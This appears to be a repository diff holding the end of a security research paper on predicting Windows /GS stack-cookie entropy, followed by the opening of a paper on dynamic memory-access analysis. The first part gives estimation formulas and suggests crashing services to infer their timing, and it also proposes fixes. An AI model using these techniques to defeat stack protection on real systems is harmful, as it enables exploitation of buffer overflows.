||||
creation time information. For example, an attacker could simply crash the
|
||||
vulnerable service once (assuming it's not a critical service) and then wait
|
||||
for it to respawn. Once it respawns, the creation time can be inferred based
|
||||
on the restart delay of the service. Granted, service restarts are limited
|
||||
to three times per day in Vista, but crashing it once should cause no major
|
||||
issues.
|
||||
|
||||
Using NtQuerySystemInformation, it's possible to collect some data that can be
|
||||
used to determine the likelihood that the creation time of a thread will be
|
||||
equal to the system time that was used when a GS cookie was generated. To
|
||||
test this, the author used the modified vulnapp.exe executable to extract the
|
||||
system time at the time that the cookie was generated. Following that, a
|
||||
separate program was used to collect the creation time information of the
|
||||
process in question using the native API. The initial thread's creation time
|
||||
was then compared with the system time to see if they were equal. The
|
||||
creation time and system time were often equal in a sample of 742 cookies.
|
||||
|
||||
Obviously, the data set describing differences is only relevant to a
|
||||
particular system load. If there are many threads waiting to run during the
|
||||
time that a process is executed, then it is unlikely that the system time will
|
||||
equal the process creation time. In a desktop environment, it's probably safe
|
||||
to assume that the thread will run immediately, but more conclusive evidence
|
||||
may be necessary.
|
||||
|
||||
Given these facts, it is apparent that the complete 64-bit system time value
|
||||
can be recovered more often than not with a great degree of accuracy just by
|
||||
simply assuming that thread creation time is the same as the system time
|
||||
value.
|
||||
|
||||
4.1.2) Process and Thread Identifier
|
||||
|
||||
The process and thread identifier are arguably the worst sources of entropy
|
||||
for the GS cookie, at least in the context of a local attack. The two high
|
||||
order bytes of the process and thread identifiers are almost always zero.
|
||||
This means they have absolutely no effect on the high order entropy.
|
||||
Additionally, the process and thread identifier can be determined with 100
|
||||
percent accuracy in a local context using the same API described in the
|
||||
previous section on getting the system time. This involves making use of
|
||||
the NtQuerySystemInformation native API with the
|
||||
SystemProcessesAndThreadsInformation system information class to get the
|
||||
process identifier and thread identifier associated with a given process
|
||||
executable.
|
||||
|
||||
The end result, obviously, is that the process and thread identifier can be
|
||||
determined with great accuracy. The one exception to this rule would be
|
||||
Windows Vista, but, as was mentioned before, alternative methods of obtaining
|
||||
the process and thread identifier may exist.
|
||||
|
||||
4.1.3) Tick Count
|
||||
|
||||
The tick count is, for all intents and purposes, simply another measure of
|
||||
time. When the GetTickCount API routine is called, the number of ticks is
|
||||
multiplied by the tick count multiplier. This multiplication effectively
|
||||
translates the number of ticks to the number of milliseconds that the system
|
||||
has been up. If one can safely assume that the that the system time used to
|
||||
generate the cookie was the same as the thread creation time, then the tick
|
||||
count at the time that the cookie was generated can simply be calculated using
|
||||
the thread creation time. The creation time isn't enough, though. Since the
|
||||
GetTickCount value measures the number of milliseconds that have occurred
|
||||
since boot, the actual uptime of the system has to be determined.
|
||||
|
||||
To determine the system uptime, a non-privileged user can again make use of
|
||||
the NtQuerySystemInformation native API, this time with the
|
||||
SystemTimeOfDayInformation system information class. This query returns the
|
||||
time that the system was booted as a 64-bit integer measured in 100 nanosecond
|
||||
intervals, just like the thread creation time. To calculate the system uptime
|
||||
in milliseconds, it's as simple as subtracting the boot time from the creation
|
||||
time and then dividing by 10000 to convert from 100 nanosecond intervals to 1
|
||||
millisecond intervals:
|
||||
|
||||
EstTickCount = (CreationTime - BootTime) / 10000
|
||||
|
||||
Some experimentation shows that this calculation is pretty accurate, but some
|
||||
quantity is lost in translation. From what the author has observed, a
|
||||
constant scaling factor of 0x4e, or 78 milliseconds, needs to be added to the
|
||||
result of this calculation. The source of this constant is as of yet unknown,
|
||||
but it appears to be a required constant. This results in the actual equation
|
||||
being:
|
||||
|
||||
EstTickCount = [(CreationTime - BootTime) / 10000] + 78
|
||||
|
||||
The end result is that the tick count can be calculated with a great degree of
|
||||
accuracy. If the system time calculation is off, then that will directly
|
||||
affect the calculation of the tick count.
|
||||
|
||||
4.1.4) Performance Counter
|
||||
|
||||
Of the four entropy sources discussed so far, the performance counter is the
|
||||
only one that really presents a challenge. The purpose of the performance
|
||||
counter is to describe the total number of cycles that have executed. On the
|
||||
outside, the performance counter would seem impossible to reliably determine.
|
||||
After all, how could one possibly determine the precise number of cycles that
|
||||
had occurred as a cookie was being generated? The answer, of course, comes
|
||||
down to the fact that the performance counter itself is, for all intents and
|
||||
purposes, just another measure of time. Windows provides two interesting
|
||||
user-mode APIs that deal with the performance counter. The first,
|
||||
QueryPerformanceCounter, is used to ask the kernel to read the current value
|
||||
of the performance counter[8]. The result of this query is stored in the 64-bit
|
||||
output parameter that the caller provides. The second API is
|
||||
QueryPerformanceFrequency. This routine is interesting because it returns a
|
||||
value that describes the amount that the performance counter will change in
|
||||
one second[7]. Documentation indicates that the frequency cannot change while
|
||||
the system is booted.
|
||||
|
||||
Using the existing knowledge about the uptime of the system and the
|
||||
calculation that can be performed to convert between the performance counter
|
||||
value and seconds, it is possible to fairly accurately guess what the
|
||||
performance counter was at the time that the cookie was generated. Granted,
|
||||
this method is more fuzzy than the previously described methods, as
|
||||
experimental results have shown a large degree of fluctuation in the lower 17
|
||||
bits. Those results will be discussed in more detail in chapter . The actual
|
||||
equation that can be used to generate the estimated performance counter is to
|
||||
take the uptime, as measured in 100 nanosecond intervals, and multiply it by
|
||||
the performance frequency divided by 10000000, which converts the frequency
|
||||
from a measure of 1 second to 100 nanosecond:
|
||||
|
||||
EstPerfCounter = UpTime x (PerfFreq / 10000000)
|
||||
|
||||
In a fashion similar to tick count, a constant scaling factor of -165000 was
|
||||
determined through experimentation. This seems to produce more accurate
|
||||
results in some of the 24 low bits. Based on this calculation, it's possible
|
||||
to accurately determine the entire 32-bit high order integer and the first 15
|
||||
bits of the 32-bit low order integer. Of course, if the system time estimate
|
||||
is wrong, then that directly effects this calculation.
|
||||
|
||||
4.1.5) Frame Pointer
|
||||
|
||||
While the frame pointer does not influence an image file's global cookie, it
|
||||
does influence a stack frame's version of the cookie. For that reason, the
|
||||
frame pointer must be considered as an overall contributor to the effective
|
||||
entropy of the cookie. With the exception of Windows Vista, the frame pointer
|
||||
should be a deterministic value that could be deduced at the time that a
|
||||
vulnerability is triggered. As such, the frame pointer should be considered a
|
||||
known value for the majority of stack-based buffer overflows. Granted, in
|
||||
multi-threaded applications, it may be more challenging to accurately guess
|
||||
the value of the frame pointer.
|
||||
|
||||
In the Windows Vista environment, the compile-time GS implementation gets a
|
||||
boost in security due to the introduction of ASLR. This helps to ensure that
|
||||
the frame pointer is actually an unknown quantity. However, it doesn't
|
||||
introduce equal entropy in all bits. In particular, octet 4, and potentially
|
||||
octet 3, may have predictable values due to the way that the randomization is
|
||||
applied to dynamic memory allocations. In order to prevent fragmentation of
|
||||
the address space, Vista's ASLR implementation attempts to ensure that stack
|
||||
regions are still allocated low in the address space. This has the side
|
||||
effect of ensuring that a non-trivial number of bits in the frame pointer will
|
||||
be predictable. Additionally, while Vista's ASLR implementation makes an
|
||||
effort to shift the lower bits of the stack pointer, there may still be some
|
||||
bits that are always predictable in octet 2.
|
||||
|
||||
4.2) Predictability of Entropy Sources in Boot Start Services
|
||||
|
||||
A second attack that could be used against GS involves attacking services that
|
||||
start early on when the system is booted. These services may experience more
|
||||
predictable states of entropy due to the fact that the amount of time it takes
|
||||
to boot up and the order in which tasks are performed is fairly, though not
|
||||
entirely, consistent. This insight may make it possible to estimate the value
|
||||
of entropy sources remotely.
|
||||
|
||||
To better understand this type of attack, the author collected 742 samples
|
||||
that were taken from a custom service that was set to automatically start
|
||||
during boot on a Windows XP SP2 installation. This service was simply
|
||||
designed to log the state used at the time that the GS cookie was being
|
||||
generated. While a sampling of the GS cookie state applied to lsass.exe would
|
||||
have been more ideal, it wasn't worth the headache of having to patch a
|
||||
critical system service. Perhaps the reader may find it interesting to
|
||||
collect this data on their own. From the samples that were taken, the
|
||||
following diagrams show the likelihood of each individual bit being set for
|
||||
each of the different entropy sources.
|
||||
|
||||
Overall, there are a number of predictable bits in things like the high
|
||||
32-bits of both the system time and the performance counter, the process
|
||||
identifier, the thread identifier, and the tick count. The sources that are
|
||||
largely unpredictable are the low 32-bits of the system time and the
|
||||
performance counter. However, if it were possible to come up with a way to
|
||||
discover the boot time (or uptime) of the system remotely, it might be
|
||||
possible to infer a good portion of the low 32-bits of the system time. This
|
||||
would then directly impact the ability to estimate things like the tick count
|
||||
and performance counters.
|
||||
|
||||
5) Experimental Results
|
||||
|
||||
This chapter describes some of the initial results that were collected using a
|
||||
utility developed by the author named gencookie.exe. This utility attempts to
|
||||
calculate the value of the cookie that was generated for the executable image
|
||||
associated with an arbitrary process, such as lsass.exe. While the results of
|
||||
this utility were limited to attempting to calculate the cookie of a process'
|
||||
executable, the techniques described in previous chapters are nonetheless
|
||||
applicable to the cookies generated in the context of dependent DLLs. The
|
||||
results described in this chapter illustrate the tool's ability to accurately
|
||||
obtain specific bits within the different components that compose the cookie,
|
||||
including specific bits of the cookie itself. This helps to paint a picture
|
||||
of the amount of true entropy that is reduced through the techniques described
|
||||
in this document.
|
||||
|
||||
The data set that was used to calculate the overall results included 5001
|
||||
samples which were collected from a single machine. The samples were
|
||||
collected through a few simple steps. First, a program called vulnapp.exe
|
||||
that was compiled with /GS was modified to have its __security_init_cookie routine
|
||||
save information about the cookie that was generated and the values that
|
||||
contributed to its generation. Following that, the gencookie.exe utility was
|
||||
launched against the running process in an attempt to calculate vulnapp.exe's
|
||||
GS cookie. A comparison between the expected and actual value of each
|
||||
component was then saved. These steps were repeated 5001 times. The author
|
||||
would be interested in hearing about independent validation of the findings
|
||||
presented in this chapter.
|
||||
|
||||
The following sections describe the bit-level predictability of each of the
|
||||
components that are used to generate the GS cookie, including the overall
|
||||
predictability of the bits of the GS cookie itself.
|
||||
|
||||
5.1) System Time
|
||||
|
||||
The system time component was highly predictable. The high 32-bit bits of the
|
||||
system time were predicted with 100 percent accuracy. The low 32-bit bits on
|
||||
the other hand were predicted with only 77 percent accuracy (3878 times). The
|
||||
reason for this discrepancy has to do with the thread scheduling scenario
|
||||
described in subsection . Even still, these results indicate that it is
|
||||
likely that the entire system time value can be accurately calculated.
|
||||
|
||||
5.2) Process and Thread Identifier
|
||||
|
||||
The process and thread identifier were successfully calculated 100 percent of
|
||||
the time using the approach outlined in section .
|
||||
|
||||
5.3) Tick Count
|
||||
|
||||
The tick count was accurately calculated 67 percent of the time (3396 times).
|
||||
The reason for this lower rate of success is due in large part to the fact
|
||||
that the tick count is calculated in relation to the estimated system time
|
||||
value. As such, if an incorrect system time value is determined, the tick
|
||||
count itself will be directly influenced. This should account for at least 23
|
||||
percent of the inaccuracies judging from how often the system time was
|
||||
inaccurately estimated. The remaining 10 percent of the inaccuracies is as of
|
||||
yet undetermined, but it is most likely related to the an improper
|
||||
interpretation of the constant scaling factor that is applied to the tick
|
||||
count. In any case, it is expected that only a few bits are actually affected
|
||||
in the remaining 10 percent of cases.
|
||||
|
||||
5.4) Performance Counter
|
||||
|
||||
The high 32-bits of the performance counter were successfully estimated 100
|
||||
percent of the time. The low 32-bits, on the other hand, show the greatest
|
||||
degree of volatility when compared to the other components. The high order 15
|
||||
bits of the low 32-bits show a bias in terms of accuracy that is not a 50/50
|
||||
split. The remaining 17 bits were all guessed correctly roughly 50 percent of
|
||||
the time. This makes the low 17 bits the only truly effective source of
|
||||
entropy in the performance counter since there is no bias shown in relation to
|
||||
the estimated versus actual values. Indeed, this is not enough to prove that
|
||||
there aren't observable patterns in the low 17 bits, but it is enough to show
|
||||
that the gencookie.exe utility was not effective in estimating them. Figures
|
||||
and show the percent accuracy for the high and low order 32-bits.
|
||||
|
||||
This discrepancy actually requires a more detailed explanation. In reality,
|
||||
the estimates made by the gencookie.exe utility are actually not as far off as
|
||||
one might think based on the percent accuracy of each bit as described in the
|
||||
diagrams. Instead, the estimates are, on average, off by only 105,000. This
|
||||
average difference is what leads to the lower 17 bits being so volatile. One
|
||||
thing that's interesting about the difference between the estimated and actual
|
||||
performance counter is that there appears to be a time oriented trend related
|
||||
to how far off the estimates are. Due to the way that the samples were taken,
|
||||
it's safe to assume that each sample is roughly equivalent to one second worth
|
||||
of time passing (due to a sleep between sample collection). Further study of
|
||||
this apparent relationship may yield better results in terms of estimating the
|
||||
lower 17 bits of the low 32 bits of the performance counter. This is left for
|
||||
future research.
|
||||
|
||||
5.5) Cookie
|
||||
|
||||
The cookie itself was never actually guessed during the course of sample
|
||||
collection. The reason for this is tightly linked with the current inability
|
||||
to accurately determine the lower 17 bits of the low 32 bits of the
|
||||
performance counter. Comparing the percent accuracy of the cookie bits with
|
||||
the percent accuracy of the low 32 bits of the performance counter yields a
|
||||
very close match.
|
||||
|
||||
6) Improvements
|
||||
|
||||
Based on the results described in chapter , the author feels that there is
|
||||
plenty of room for improvement in the way that GS cookies are currently
|
||||
generated. It's clear that there is a need to ensure that there are 32 bits
|
||||
of true entropy in the cookie. The following sections outline some potential
|
||||
solutions to the entropy issue described in this document.
|
||||
|
||||
6.1) Better Entropy Sources
|
||||
|
||||
Perhaps the most obvious solution would be to simply improve the set of
|
||||
entropy sources used to generate the cookie. In particular, the use of
|
||||
sources with greater degrees of entropy, especially in the high order bits,
|
||||
would be of great benefit. The challenge, however, is locating sources that
|
||||
are easy to interact with and require very little overhead. For example, it's
|
||||
not really feasible to have the GS cookie generator rely on the crypto API due
|
||||
to the simple fact that this would introduce a dependency on the crypto API in
|
||||
any application that was compiled with /GS. As this document has hopefully
|
||||
shown, it's also a requirement that any additional entropy sources be
|
||||
challenging to estimate externally at a future point in time.
|
||||
|
||||
Even though this is a viable solution, the author is not presently aware of
|
||||
any additional entropy sources that would meet all three requirements. For
|
||||
this reason, the author feels that this approach alone is insufficient to
|
||||
solve the problem. If entropy sources are found which meet these
|
||||
requirements, the author would love to hear about them.
|
||||
|
||||
6.2) Seeding High Order Bits
|
||||
|
||||
A more immediate solution to the problem at hand would involve simply ensuring
|
||||
that the predictable high order bits are seeded with less predictable values.
|
||||
However, additional entropy sources would be required in order to implement
|
||||
this properly. At present, the only major source of entropy found in the GS
|
||||
cookie is the low order bits of the performance counter. It would not be
|
||||
sufficient to simply shift the low order bits of the performance counter into
|
||||
the high order. Doing so would add absolutely no value by itself because it
|
||||
would have no effect on the amount of true entropy in the cookie.
|
||||
|
||||
6.3) External Cookie Generation
|
||||
|
||||
An alternative solution that could combine the effects of the first two
|
||||
solutions would be to change the GS implementation to generate the cookie
|
||||
external to the binary itself. One of the most dangerous aspects of the GS
|
||||
implementation is that it is statically linked and therefore would require a
|
||||
recompilation of all affected binaries in the event that a weakness is found.
|
||||
This fact alone should be scary. To help address both this problem and the
|
||||
problem of weak entropy sources, it makes sense to consider a more dynamic
|
||||
approach.
|
||||
|
||||
One example of a dynamic approach would be to have the GS implementation issue
|
||||
a call into a kernel-mode routine that is responsible for generating GS
|
||||
cookies. One place that this support could be added is in
|
||||
NtQuerySystemInformation, though it's likely that a better place may exist.
|
||||
Regardless of the specific routine, this approach would have the benefit of
|
||||
moving the code used to generate the cookie out of the statically linked stub
|
||||
that is inserted by the compiler. If any weakness were to be found in the
|
||||
kernel-mode routine that generates the cookie, Microsoft could issue a patch
|
||||
that would immediately affect all applications compiled to use GS. This would
|
||||
solve some of the concerns relating to the static nature of GS.
|
||||
|
||||
Perhaps even better, this approach would grant greater flexibility to the
|
||||
entropy sources that could be used in the generation of the cookie. Since the
|
||||
routine would exist in kernel-mode, it would have the benefit of being able to
|
||||
access additional sources of entropy that may be challenging or clumsy to
|
||||
interact with from user-mode (though the counterpoint could certainly be made
|
||||
as well). The kernel-mode routine could also accumulate entropy over time and
|
||||
feed that back into the cookie, whereas the statically linked implementation
|
||||
has no context with which to accumulate entropy. The accumulation of state
|
||||
can also do more harm than good. It would be disingenuous to not admit that
|
||||
this approach could also have its own set of problems. A poorly implemented
|
||||
version of this solution might make it possible for a user to eliminate all
|
||||
entropy by issuing a non-trivial number of calls to the kernel-mode routine.
|
||||
There may be additional consequences that have not yet been perceived.
|
||||
|
||||
The impact on performance is also a big point of concern for any potential
|
||||
change to the cookie generation path. At a high-level, a transition into
|
||||
kernel-mode would seem concerning in terms of the amount of overhead that
|
||||
might be added. However, it's important to note that the current
|
||||
implementation of GS already transitions into kernel-mode to obtain some of
|
||||
it's information. Specifically, performance counter information is obtained
|
||||
through the system call NtQueryPerformanceCounter. Even more, this system
|
||||
call results in an in operation on an I/O port that is used to query the
|
||||
current performance counter.
|
||||
|
||||
Another important consideration is backward compatibility. If Microsoft were
|
||||
to implement this solution, it would be necessary for applications compiled
|
||||
with the new support to still be able benefit from GS on older platforms that
|
||||
don't support the new kernel interface. To allow for backward compatibility,
|
||||
Microsoft could implement a combination of all three solutions, whereby better
|
||||
entropy sources and seeding of high order bits are used as a fallback in the
|
||||
event that the kernel-mode interface is not present.
|
||||
|
||||
As it turns out, Microsoft does indeed have a mechanism that could allow them
|
||||
to create a patch that would affect the majority of the binaries compiled with
|
||||
recent versions of GS. This functionality is provided by exposing the address
|
||||
of an image file's security cookie in its the load config data directory.
|
||||
When the dynamic loader (ntdll) loads an image file, it checks to see if the
|
||||
security cookie address in the load config data directory is non-NULL. If
|
||||
it's not NULL, the loader proceeds to store the process-wide GS cookie in the
|
||||
module-specific's GS cookie location. In this way, the __security_init_cookie
|
||||
routine that's called by the image file's entry point effectively becomes a
|
||||
no-operation because the cookie will have already been initialized. This
|
||||
manner of setting the GS cookie for image files provides Microsoft with much
|
||||
more flexibility. Rather than having to update all binaries compiled with GS,
|
||||
Microsoft can simply update a single binary (ntdll.dll) if improvements need
|
||||
to be made to the cookie generation algorithm. The following output shows a
|
||||
sample of dumpbin /loadconfig on kernel32.dll:
|
||||
|
||||
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
|
||||
Dump of file c:\windows\system32\kernel32.dll
|
||||
|
||||
File Type: DLL
|
||||
|
||||
Section contains the following load config:
|
||||
|
||||
00000048 size
|
||||
0 time date stamp
|
||||
...
|
||||
7C8836CC Security Cookie
|
||||
|
||||
7) Future Work
|
||||
|
||||
There is still additional work that can be done to further refine the
|
||||
techniques described in this document. This chapter outlines some of the
|
||||
major items that could be followed up on.
|
||||
|
||||
7.1) Improving Performance Counter Estimates
|
||||
|
||||
One area in particular that the author feels could benefit from further
|
||||
research has to do with refining the technique used to calculate the
|
||||
performance counter. A more thorough analysis of the apparent association
|
||||
between time and the lower 17 bits of the performance counter is necessary.
|
||||
This analysis would directly affect the ability to recover more cookie state
|
||||
information, since the entropy of the lower 17 bits of the performance counter
|
||||
is one of the only things standing in the way of obtaining the entire cookie.
|
||||
|
||||
7.2) Remote Attacks
|
||||
|
||||
The ability to apply the techniques described in this document in a remote
|
||||
scenario would obviously increase the severity of the problem. In order to do
|
||||
this, an attacker would need the ability to either infer or be able to
|
||||
calculate some of the key elements that are used in the generation of a
|
||||
cookie. This would rely on being able to determine things like the process
|
||||
creation time, the process and thread identifier, and the system uptime. With
|
||||
these values, it should be possible to predict the state of the cookie with
|
||||
similar degrees of accuracy. Of course, methods of obtaining this information
|
||||
remotely are not obvious.
|
||||
|
||||
One point of consideration that should be made is that even if it's not
|
||||
possible to directly determine some of this information, it may be possible to
|
||||
infer it. For instance, consider a scenario where a vulnerability in a
|
||||
service is exposed remotely. There's nothing to stop an attacker from causing
|
||||
the service to crash. In most cases, the service will restart at some
|
||||
predefined point (such as 30 seconds after the crash). Using this approach,
|
||||
an attacker could infer the creation time of the process based on the time
|
||||
that the crash was generated. This isn't fool proof, but it should be
|
||||
possible to get fairly close.
|
||||
|
||||
Determining process and thread identifier could be tricky, especially if the
|
||||
system has been up for some time. The author is not aware of a general
|
||||
purpose technique that could be used to determine this information remotely.
|
||||
Fortunately, the process and thread identifier have very little effect on high
|
||||
order bits.
|
||||
|
||||
The system uptime is an interesting one. In the past, there have been
|
||||
techniques that could be used to estimate the uptime of the system through the
|
||||
use of TCP timestamps and other network protocol anomalies. At the time of
|
||||
this writing, the author is not aware of how prevalent or useful these
|
||||
techniques are against modern operating systems. Should they still be
|
||||
effective, they would represent a particularly useful way of obtaining a
|
||||
system's uptime. If an attacker can obtain both the creation time of the
|
||||
process and the uptime of the system, it's possible to calculate the tick
|
||||
count and performance counter values with varying degrees of accuracy.
|
||||
|
||||
The performance counter will still pose a great challenge in the remote
|
||||
scenario. The reliance on the performance frequency shouldn't be seen as an
|
||||
unknown quantity. As far as the author is aware, the performance frequency on
|
||||
modern processors is generally 3579545, though there may be certain power
|
||||
situations that would cause it to be different.
|
||||
|
||||
It is also important to note that the current attack assumes that the load
|
||||
time for an image that has a GS cookie is equivalent to the initial thread's
|
||||
creation time. For example, if a DLL were loaded much later in process
|
||||
execution, such as through instantiating a COM object in Internet Explorer, it
|
||||
would not be possible to assume that initial thread creation time is equal to
|
||||
the system time that was obtained when the DLL's GS cookie was generated.
|
||||
This brings about an interesting point for the remote scenario, however. If
|
||||
an attacker can control the time at which a DLL is loaded, it may be possible
|
||||
for them to infer the value of system time that is used without even having to
|
||||
directly query it. One example of this would be in the context of internet
|
||||
explorer, where the client's date and time functionality might be abused to
|
||||
obtain this information.
|
||||
|
||||
8) Conclusion
|
||||
|
||||
The ability to reduce the amount of effective entropy in a GS cookie can
|
||||
improve an attacker's chances of guessing the cookie. This paper has
|
||||
described two techniques that may be used to calculate or infer the values of
|
||||
certain bits in a GS cookie. The first approach involves a local attacker's
|
||||
ability to collect information that makes it possible to calculate, with
|
||||
pretty good accuracy, the values of the entropy sources that were used at the
|
||||
time that a cookie was generated. The second approach describes the potential
|
||||
for abusing the limited entropy associated with boot start services.
|
||||
|
||||
While the results shown in this paper do not represent a complete break of GS,
|
||||
they do hint toward a general weakness in the way that GS cookies are
|
||||
generated. This is particularly serious given the fact that GS is a compile
|
||||
time solution. If the techniques described in this document are refined, or
|
||||
new and improved techniques are identified, a complete break of GS would
|
||||
require the recompilation of all affected binaries. The implications of this
|
||||
should be obvious. The ability to reliably predict the value of a GS cookie
|
||||
would effectively nullify any benefits that GS adds. It would mean that all
|
||||
stack-based buffer overflows would immediately become exploitable.
|
||||
|
||||
To help contribute to the improvement of GS, a few different solutions were
|
||||
described that could either partially or wholly address some of the weakness
|
||||
that were identified. The most interesting of these solutions involves
|
||||
modifying the GS implementation to make use of a external cookie generator,
|
||||
such as the kernel. Going this route would ensure that any weaknesses found
|
||||
in the cookie generation algorithm could be simply addressed through a patch
|
||||
to the kernel. This is much more reasonable than expecting all existing GS
|
||||
enabled binaries to be recompiled.
|
||||
|
||||
It's unclear whether the techniques presented in this paper will have any
|
||||
appreciable effect on future exploits. Only time will tell.
|
||||
|
||||
References
|
||||
|
||||
[1] Cowan, Crispin et al. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks.
|
||||
http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html; accessed 3/18/2007.
|
||||
|
||||
[2] Etoh, Hiroaki. GCC extension for protecting applications from stack-smashing attacks.
|
||||
http://www.research.ibm.com/trl/projects/security/ssp/; accessed 3/18/2007.
|
||||
|
||||
[3] eEye. Memory Retrieval Vulnerabilities.
|
||||
http://research.eeye.com/html/Papers/download/eeyeMRV-Oct2006.pdf; accessed 3/18/2007.
|
||||
|
||||
[4] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
|
||||
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf; accessed 3/18/2007.
|
||||
|
||||
[5] Microsoft Corporation. /GS (Buffer Security Check).
|
||||
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx; accessed 3/18/2007.
|
||||
|
||||
[6] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
|
||||
http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx; accessed 3/18/2007.
|
||||
|
||||
[7] Microsoft Corporation. QueryPerformanceFrequency Function.
|
||||
http://msdn2.microsoft.com/en-us/library/ms644905.aspx; accessed 3/18/2007
|
||||
|
||||
[8] Microsoft Corporation. QueryPerformanceCounter Function.
|
||||
http://msdn2.microsoft.com/en-us/library/ms644904.aspx; accessed 3/18/2007
|
||||
|
||||
[9] Ren, Chris et al. Microsoft Compiler Flaw Technical Note
|
||||
http://www.cigital.com/news/index.php?pg=art&artid=70; accessed 3/18/2007.
|
||||
|
||||
[10] Whitehouse, Ollie. Analysis of GS protections in Windows Vista
|
||||
http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf; accessed 3/20/2007.
|
800
uninformed/7.2.txt
Normal file
800
uninformed/7.2.txt
Normal file
|
@ -0,0 +1,800 @@
|
|||
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
|
||||
skape
|
||||
mmiller@hick.org
|
||||
4/2007
|
||||
|
||||
Abstract
|
||||
|
||||
This paper describes strategies for dynamically analyzing an application's
|
||||
memory access behavior. These strategies make it possible to detect when a
|
||||
read or write is about to occur at a given location in memory while an
|
||||
application is executing. An application's memory access behavior can provide
|
||||
additional insight into its behavior. For example, it may be able to provide
|
||||
an idea of how data propagates throughout the address space. Three individual
|
||||
strategies which can be used to intercept memory accesses are described in
|
||||
this paper. Each strategy makes use of a unique method of intercepting memory
|
||||
accesses. These methods include the use of Dynamic Binary Instrumentation
|
||||
(DBI), x86 hardware paging features, and x86 segmentation features. A
|
||||
detailed description of the design and implementation of these strategies for
|
||||
32-bit versions of Windows is given. Potential uses for these analysis
|
||||
techniques are described in detail.
|
||||
|
||||
1) Introduction
|
||||
|
||||
If software analysis had a holy grail, it would more than likely be centered
|
||||
around the ability to accurately model the data flow behavior of an
|
||||
application. After all, applications aren't really much more than
|
||||
sophisticated data processors that operate on varying sets of input to produce
|
||||
varying sets of output. Describing how an application behaves when it
|
||||
encounters these varying sets of input makes it possible to predict future
|
||||
behavior. Furthermore, it can provide insight into how the input could be
|
||||
altered to cause the application to behave differently. Given these benefits,
|
||||
it's only natural that a discipline exists that is devoted to the study of
|
||||
data flow analysis.
|
||||
|
||||
There are a two general approaches that can be taken to perform data flow
|
||||
analysis. The first approach is referred to as static analysis and it
|
||||
involves analyzing an application's source code or compiled binaries without
|
||||
actually executing the application. The second approach is dynamic analysis
|
||||
which, as one would expect, involves analyzing the data flow of an application
|
||||
as it executes. The two approaches both have common and unique benefits and
|
||||
no argument will be made in this paper as to which may be better or worse.
|
||||
Instead, this paper will focus on describing three strategies that may be used
|
||||
to assist in the process of dynamic data flow analysis.
|
||||
|
||||
The first strategy involves using Dynamic Binary Instrumentation (DBI) to
|
||||
rewrite the instruction stream of the executing application in a manner that
|
||||
makes it possible to intercept instructions that read from or write to memory.
|
||||
Two well-known examples of DBI implementations that the author is familiar
|
||||
with are DynamoRIO and Valgrind[3, 11]. The second strategy that will be
|
||||
discussed involves using the hardware paging features of the x86 and x64
|
||||
architectures to trap and handle access to specific pages in memory. Finally,
|
||||
the third strategy makes use of the segmentation features included in the x86
|
||||
architecture to trap memory accesses by making use of the null selector.
|
||||
Though these three strategies vary greatly, they all accomplish the same goal
|
||||
of being able to intercept memory accesses within an application as it
|
||||
executes.
|
||||
|
||||
The ability to intercept memory reads and writes during runtime can support
|
||||
research in additional areas relating to dynamic data flow analysis. For
|
||||
example, the ability to track what areas of code are reading from and writing
|
||||
to memory could make it possible to build a model for the data propagation
|
||||
behaviors of an application. Furthermore, it might be possible to show with
|
||||
what degree of code-level isolation different areas of memory are accessed.
|
||||
Indeed, it may also be possible to attempt to validate the data consistency
|
||||
model of a threaded application by investigating the access behaviors of
|
||||
various regions of memory which are referenced by multiple threads. These are
|
||||
but a few of the many potential candidates for dynamic data flow analysis.
|
||||
|
||||
This paper is organized into three sections. Section 2 gives an introduction
|
||||
to three different strategies for facilitating dynamic data flow analysis.
|
||||
Section 3 enumerates some of the potential scenarios in which these strategies
|
||||
could be applied in order to render some useful information about the data
|
||||
flow behavior of an application. Finally, section 4 describes some of the
|
||||
previous work whose concepts have been used as the basis for the research
|
||||
described herein.
|
||||
|
||||
2) Strategies
|
||||
|
||||
This section describes three strategies that can be used to intercept runtime
|
||||
memory accesses. The strategies described herein do not rely on any static
|
||||
binary analysis. Techniques that do make use of static binary analysis are
|
||||
outside of the scope of this paper.
|
||||
|
||||
2.1) Dynamic Binary Instrumentation
|
||||
|
||||
Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of
|
||||
a binary application at runtime through the injection of instrumentation code.
|
||||
This instrumentation code executes as part of the normal instruction stream
|
||||
after being injected. In most cases, the instrumentation code will be
|
||||
entirely transparent to the application that it's been injected to. Analyzing
|
||||
an application at runtime makes it possible to gain insight into the behavior
|
||||
and state of an application at various points in execution. This highlights
|
||||
one of the key differences between static binary analysis and dynamic binary
|
||||
analysis. Rather than considering what may occur, dynamic binary analysis has
|
||||
the benefit of operating on what actually does occur. This is by no means
|
||||
exhaustive in terms of exercising all code paths in the application, but it
|
||||
makes up for this by providing detailed insight into an application's concrete
|
||||
execution state.
|
||||
|
||||
The benefits of DBI have made it possible to develop some incredibly advanced
|
||||
tools. Examples where DBI might be used include runtime profiling,
|
||||
visualization, and optimization tools. DBI implementations generally fall
|
||||
into two categories: light-weight or heavy-weight. A light-weight DBI
|
||||
operates on the architecture-specific instruction stream and state when
|
||||
performing analysis. A heavy-weight DBI operates on an abstract form of the
|
||||
instruction stream and state. An example a heavy-weight DBI is Valgrind which
|
||||
performs analysis on an intermediate representation of the machine state[11,
|
||||
7]. An example of a light-weight DBI is DynamoRIO which performs analysis
|
||||
using the architecture-specific state[3]. The benefit of a heavy-weight DBI
|
||||
over a light-weight DBI is that analysis code written against the intermediate
|
||||
representation is immediately portable to other architectures, whereas
|
||||
light-weight DBI analysis implementations must be fine-tuned to work with
|
||||
individual architectures. While Valgrind is a novel and interesting
|
||||
implementation, it is currently not supported on Windows. For this reason,
|
||||
attention will be given to DynamoRIO for the remainder of this paper. There are
|
||||
